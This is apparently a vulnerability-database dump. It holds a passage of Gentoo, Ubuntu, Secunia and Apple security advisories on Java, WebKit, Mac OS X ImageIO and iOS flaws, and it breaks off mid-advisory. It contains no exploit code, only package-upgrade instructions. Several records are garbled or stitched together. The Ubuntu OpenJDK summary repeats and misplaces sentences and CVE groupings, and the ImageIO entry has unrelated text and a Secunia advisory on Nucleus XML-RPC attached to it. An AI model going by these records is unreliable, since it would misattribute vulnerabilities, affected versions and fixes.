http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 85 ] CVE-2013-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491
[ 86 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 87 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 88 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 89 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 90 ] CVE-2013-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540
[ 91 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 92 ] CVE-2013-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558
[ 93 ] CVE-2013-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561
[ 94 ] CVE-2013-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563
[ 95 ] CVE-2013-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564
[ 96 ] CVE-2013-1569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 97 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 98 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 99 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 100 ] CVE-2013-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394
[ 101 ] CVE-2013-2400
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400
[ 102 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 103 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 104 ] CVE-2013-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414
[ 105 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 106 ] CVE-2013-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416
[ 107 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 108 ] CVE-2013-2418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418
[ 109 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 110 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 111 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 112 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 113 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 114 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 115 ] CVE-2013-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425
[ 116 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 117 ] CVE-2013-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427
[ 118 ] CVE-2013-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428
[ 119 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 120 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 121 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 122 ] CVE-2013-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432
[ 123 ] CVE-2013-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433
[ 124 ] CVE-2013-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434
[ 125 ] CVE-2013-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435
[ 126 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 127 ] CVE-2013-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437
[ 128 ] CVE-2013-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438
[ 129 ] CVE-2013-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439
[ 130 ] CVE-2013-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440
[ 131 ] CVE-2013-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442
[ 132 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 133 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 134 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 135 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 136 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 137 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 138 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 139 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 140 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 141 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 142 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 143 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 144 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 145 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 146 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 147 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 148 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 149 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 150 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 151 ] CVE-2013-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462
[ 152 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 153 ] CVE-2013-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464
[ 154 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 155 ] CVE-2013-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466
[ 156 ] CVE-2013-2467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467
[ 157 ] CVE-2013-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468
[ 158 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 159 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 160 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 161 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 162 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 163 ] CVE-2013-3743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743
[ 164 ] CVE-2013-3744
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744
[ 165 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 166 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 167 ] CVE-2013-5774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 168 ] CVE-2013-5775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775
[ 169 ] CVE-2013-5776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776
[ 170 ] CVE-2013-5777
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777
[ 171 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 172 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 173 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 174 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 175 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 176 ] CVE-2013-5787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787
[ 177 ] CVE-2013-5788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788
[ 178 ] CVE-2013-5789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789
[ 179 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 180 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 181 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 182 ] CVE-2013-5801
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801
[ 183 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 184 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 185 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 186 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 187 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 188 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 189 ] CVE-2013-5810
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810
[ 190 ] CVE-2013-5812
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812
[ 191 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 192 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 193 ] CVE-2013-5818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818
[ 194 ] CVE-2013-5819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819
[ 195 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 196 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 197 ] CVE-2013-5824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824
[ 198 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 199 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 200 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 201 ] CVE-2013-5831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831
[ 202 ] CVE-2013-5832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832
[ 203 ] CVE-2013-5838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838
[ 204 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 205 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 206 ] CVE-2013-5843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843
[ 207 ] CVE-2013-5844
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844
[ 208 ] CVE-2013-5846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846
[ 209 ] CVE-2013-5848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848
[ 210 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 211 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 212 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 213 ] CVE-2013-5852
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852
[ 214 ] CVE-2013-5854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854
[ 215 ] CVE-2013-5870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870
[ 216 ] CVE-2013-5878
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878
[ 217 ] CVE-2013-5887
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887
[ 218 ] CVE-2013-5888
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888
[ 219 ] CVE-2013-5889
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889
[ 220 ] CVE-2013-5893
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893
[ 221 ] CVE-2013-5895
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895
[ 222 ] CVE-2013-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896
[ 223 ] CVE-2013-5898
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898
[ 224 ] CVE-2013-5899
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899
[ 225 ] CVE-2013-5902
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902
[ 226 ] CVE-2013-5904
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904
[ 227 ] CVE-2013-5905
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905
[ 228 ] CVE-2013-5906
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906
[ 229 ] CVE-2013-5907
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907
[ 230 ] CVE-2013-5910
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910
[ 231 ] CVE-2014-0368
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368
[ 232 ] CVE-2014-0373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373
[ 233 ] CVE-2014-0375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375
[ 234 ] CVE-2014-0376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376
[ 235 ] CVE-2014-0382
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382
[ 236 ] CVE-2014-0385
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385
[ 237 ] CVE-2014-0387
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387
[ 238 ] CVE-2014-0403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403
[ 239 ] CVE-2014-0408
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408
[ 240 ] CVE-2014-0410
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410
[ 241 ] CVE-2014-0411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411
[ 242 ] CVE-2014-0415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415
[ 243 ] CVE-2014-0416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416
[ 244 ] CVE-2014-0417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417
[ 245 ] CVE-2014-0418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418
[ 246 ] CVE-2014-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422
[ 247 ] CVE-2014-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423
[ 248 ] CVE-2014-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424
[ 249 ] CVE-2014-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ============================================================================
Ubuntu Security Notice USN-1619-1
October 26, 2012
openjdk-6, openjdk-7 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK. An attacker could exploit these
to cause a denial of service.
These issues only affected Ubuntu 12.10. (CVE-2012-5067, CVE-2012-5070)
Vulnerabilities were discovered in the OpenJDK JRE related to data
integrity. (CVE-2012-5073, CVE-2012-5079)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. This issue only affected Ubuntu 12.10. An attacker could exploit these
to cause a denial of service. These issues only affected Ubuntu 12.10.
(CVE-2012-5076, CVE-2012-5087, CVE-2012-5088)
A denial of service vulnerability was found in OpenJDK. (CVE-2012-5081)
Please see the following for more information:
http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.10:
icedtea-7-jre-cacao 7u9-2.3.3-0ubuntu1~12.10.1
icedtea-7-jre-jamvm 7u9-2.3.3-0ubuntu1~12.10.1
openjdk-7-jre 7u9-2.3.3-0ubuntu1~12.10.1
openjdk-7-jre-headless 7u9-2.3.3-0ubuntu1~12.10.1
openjdk-7-jre-lib 7u9-2.3.3-0ubuntu1~12.10.1
openjdk-7-jre-zero 7u9-2.3.3-0ubuntu1~12.10.1
Ubuntu 12.04 LTS:
icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~12.04.1
icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~12.04.1
openjdk-6-jre 6b24-1.11.5-0ubuntu1~12.04.1
openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~12.04.1
openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~12.04.1
openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~12.04.1
Ubuntu 11.10:
icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~11.10.1
icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~11.10.1
openjdk-6-jre 6b24-1.11.5-0ubuntu1~11.10.1
openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~11.10.1
openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~11.10.1
openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~11.10.1
Ubuntu 11.04:
icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~11.04.1
icedtea-6-jre-jamvm 6b24-1.11.5-0ubuntu1~11.04.1
openjdk-6-jre 6b24-1.11.5-0ubuntu1~11.04.1
openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~11.04.1
openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~11.04.1
openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~11.04.1
Ubuntu 10.04 LTS:
icedtea-6-jre-cacao 6b24-1.11.5-0ubuntu1~10.04.2
openjdk-6-jre 6b24-1.11.5-0ubuntu1~10.04.2
openjdk-6-jre-headless 6b24-1.11.5-0ubuntu1~10.04.2
openjdk-6-jre-lib 6b24-1.11.5-0ubuntu1~10.04.2
openjdk-6-jre-zero 6b24-1.11.5-0ubuntu1~10.04.2
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any Java
applications or applets to make all the necessary changes |
|
var-200809-0182
|
ImageIO in Apple Mac OS X 10.4.11 and 10.5 through 10.5.4 allows context-dependent attackers to cause a denial of service (memory corruption and application crash) or execute arbitrary code via a crafted JPEG image with an embedded ICC profile. Apple Mac OS X Leopard does not accurately reflect which files and directories are available via sharing. A vulnerability in a common PHP extension module could allow a remote attacker to execute code on a vulnerable system.
The security update addresses a total of 17 new vulnerabilities that affect the Apple Type Services, Directory Services, Finder, ImageIO, Kernel, Login Windows, SearchKit, System Configuration, System Preferences, Time Machine, VideoConference, and Wiki Server components of Mac OS X. The advisory also contains security updates for 17 previously reported issues. Viewing very large JPEG graphics can lead to unexpected application termination or arbitrary code execution.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
Nucleus XML-RPC PHP Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA15895
VERIFY ADVISORY:
http://secunia.com/advisories/15895/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
>From remote
SOFTWARE:
Nucleus 3.x
http://secunia.com/product/3699/
DESCRIPTION:
A vulnerability has been reported in Nucleus, which can be exploited
by malicious people to compromise a vulnerable system.
For more information:
SA15852
SOLUTION:
Update to version 3.21.
http://sourceforge.net/project/showfiles.php?group_id=66479
OTHER REFERENCES:
SA15852:
http://secunia.com/advisories/15852/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
|
|
var-201903-0417
|
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.1.3, tvOS 12.1.2, watchOS 5.1.3, Safari 12.0.3, iTunes 12.9.3 for Windows, iCloud for Windows 7.10. Processing maliciously crafted web content may lead to arbitrary code execution. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * Sandbox avoidance * Arbitrary code execution * Privilege escalation * information leak * Information falsification * Service operation interruption (DoS) * Arbitrary script execution. WebKit is prone to multiple memory-corruption vulnerabilities.
A remote attacker can leverage these issues to execute arbitrary code in the context of the user running the application. Failed exploit attempts may result in a denial-of-service condition. Apple iOS, etc. are all products of Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that is the default browser included with Mac OS X and iOS operating systems. WebKit is one of the web browser engine components. A security vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple iOS prior to 12.1.3; Safari prior to 12.0.3; tvOS prior to 12.1.2; watchOS 5.1.3; Windows-based iCloud prior to 7.10.
Installation note:
Safari 12.0.3 may be obtained from the Mac App Store. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201903-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebkitGTK+: Multiple vulnerabilities
Date: March 14, 2019
Bugs: #672108, #674702, #678334
ID: 201903-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebkitGTK+, the worst of
which could result in the arbitrary execution of code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine,
suitable for projects requiring any kind of web integration, from
hybrid HTML/CSS applications to full-fledged web browsers.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.22.6 >= 2.22.6
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the referenced CVE identifiers for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebkitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.22.6"
References
==========
[ 1 ] CVE-2019-6212
https://nvd.nist.gov/vuln/detail/CVE-2019-6212
[ 2 ] CVE-2019-6215
https://nvd.nist.gov/vuln/detail/CVE-2019-6215
[ 3 ] CVE-2019-6216
https://nvd.nist.gov/vuln/detail/CVE-2019-6216
[ 4 ] CVE-2019-6217
https://nvd.nist.gov/vuln/detail/CVE-2019-6217
[ 5 ] CVE-2019-6226
https://nvd.nist.gov/vuln/detail/CVE-2019-6226
[ 6 ] CVE-2019-6227
https://nvd.nist.gov/vuln/detail/CVE-2019-6227
[ 7 ] CVE-2019-6229
https://nvd.nist.gov/vuln/detail/CVE-2019-6229
[ 8 ] CVE-2019-6233
https://nvd.nist.gov/vuln/detail/CVE-2019-6233
[ 9 ] CVE-2019-6234
https://nvd.nist.gov/vuln/detail/CVE-2019-6234
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201903-12
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2019 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2019-1-22-1 iOS 12.1.3
iOS 12.1.3 is now available and addresses the following:
AppleKeyStore
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-6235: Brandon Azad
Bluetooth
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
execute arbitrary code
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-6200: an anonymous researcher
Core Media
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-6202: Fluoroacetate working with Trend Micro's Zero Day
Initiative
CVE-2019-6221: Fluoroacetate working with Trend Micro's Zero Day
Initiative
CoreAnimation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-6231: Zhuo Liang of Qihoo 360 Nirvan Team
CoreAnimation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-6230: Proteas, Shrek_wzw and Zhuo Liang of Qihoo 360 Nirvan
Team
FaceTime
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A remote attacker may be able to initiate a FaceTime call
causing arbitrary code execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2019-6224: Natalie Silvanovich of Google Project Zero
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to break out of its
sandbox
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-6214: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-6225: Brandon Azad of Google Project Zero, Qixun Zhao of
Qihoo 360 Vulcan Team
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-6210: Ned Williamson of Google
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may cause unexpected changes in
memory shared between processes
Description: A memory corruption issue was addressed with improved
lock state checking.
CVE-2019-6205: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-6213: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to determine kernel
memory layout
Description: An out-of-bounds read issue existed that led to the
disclosure of kernel memory. This was addressed with improved input
validation.
CVE-2019-6209: Brandon Azad of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may cause unexpected changes in
memory shared between processes
Description: A memory initialization issue was addressed with
improved memory handling.
